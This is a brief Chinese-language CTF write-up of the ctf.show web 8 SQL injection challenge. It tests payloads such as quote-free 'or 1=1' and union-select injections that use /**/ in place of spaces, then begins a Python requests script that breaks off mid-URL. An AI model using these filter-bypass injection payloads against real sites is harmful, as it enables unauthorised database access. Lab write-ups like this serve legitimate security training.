ctf.show web 8 sql注入过滤了’
开始的页面
提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误
第二步试下/**/替代空格,还是错误
第三步,去掉’单引号,成功,说明过滤了单引号
查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#
,但是这里又提示sql错误,这里可能过滤了select和union关键字
上脚本,这的脚本是网上找的
import requests
s=requests.session()
url='http://1a52462e-b3aa-4f50-8445-0792a199259e.chall.ctf.